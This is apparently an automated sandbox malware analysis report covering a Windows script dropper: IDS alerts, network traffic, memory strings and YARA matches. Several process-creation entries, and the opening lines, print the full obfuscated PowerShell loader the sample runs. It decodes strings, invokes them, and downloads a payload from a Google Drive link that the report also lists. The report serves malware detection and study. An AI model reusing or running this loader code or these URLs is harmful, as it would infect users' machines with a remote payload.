pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityk

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T15:52:47.776128+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49715	216.58.206.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49716 version: TLS 1.2

Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32U source: powershell.exe, 00000005.00000002.2427817287.00000000007AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb` source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdb source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2033699414.00000192E5E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030985860.00000192E5C01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Crustaceology (Virksomhedskategoris 'Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb ') source: powershell.exe, 00000002.00000002.2263730437.000002E06D908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DF2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430583673.0000000004496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457764685.00000000053B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb source: powershell.exe, 00000005.00000002.2430583673.0000000004496000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.2463994877.0000000006E01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: aqm.Core.pdbcy source: powershell.exe, 00000005.00000002.2463994877.0000000006E01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb X source: powershell.exe, 00000002.00000002.2229676697.000002E05DC42000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32405117-2476756634-10038 source: powershell.exe, 00000005.00000002.2427817287.00000000007AF000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49715 -> 216.58.206.78:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: powershell.exe, 00000005.00000002.2463994877.0000000006DE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.2268835169.000002E075951000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F3BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430583673.0000000004341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2430583673.0000000004341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F37D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DAFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/g
Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/o
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4RP
Source: powershell.exe, 00000005.00000002.2430583673.0000000004496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4RXR
Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2851327950.00000000058C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1
Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1(
Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw13
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe, 00000007.00000002.2851401747.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2569079355.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000002.00000002.2229676697.000002E05F412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DAFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DAFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download
Source: msiexec.exe, 00000007.00000002.2851401747.000000000598D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1&export=download
Source: powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2271865944.000002E075C22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.m80;
Source: powershell.exe, 00000002.00000002.2271865944.000002E075C22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.m80;s$
Source: powershell.exe, 00000002.00000002.2229676697.000002E05E499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49716 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_1900.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6592.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz 